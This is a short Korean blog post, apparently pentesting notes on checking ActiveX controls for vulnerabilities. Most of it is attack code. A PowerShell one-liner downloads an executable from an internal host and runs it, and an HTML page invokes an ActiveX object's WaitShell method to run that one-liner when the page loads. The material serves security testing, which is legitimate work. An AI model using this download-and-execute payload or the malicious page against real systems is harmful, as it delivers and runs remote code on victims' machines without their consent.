-
Active X 취약점 점검Hack/No filtered 2022. 2. 3. 12:55
COMRaider 사용
visual C++ 6.0 / tstcon32.exe 사용powershell 을 이용한 파일 다운로드 & 파일 실행 한줄 명령어
cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe
함수 사용 예시
<html>
<head>
<title>MyActiveX webpage</title>
</head>
<body>
<OBJECT id="myActiveX" classid="clsid:00000000-0000-0000-0000-000000000000"></OBJECT>
<script type="text/javascript">
try {
var obj = document.myActiveX;
if (obj) {
obj.WaitShell("cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe","0");
} else {
alert("Object is not created!");
}
} catch (ex) {
alert("Some error happens, error message is: " + ex.Description);
}
</script>
</body>
</html>'Hack > No filtered' 카테고리의 다른 글
linux 열린 포트 서비스 데몬 확인 명령어 (0) 2022.02.03 iOS 취약점 진단 (메모리 덤프, 파일 비교) (0) 2022.02.03 windbg crash dump exploitable (0) 2022.01.27 [Android] Bluetooth Snoop HCI log (0) 2021.04.01 Nox에 Burp 인증서 설치 (System) (0) 2021.01.13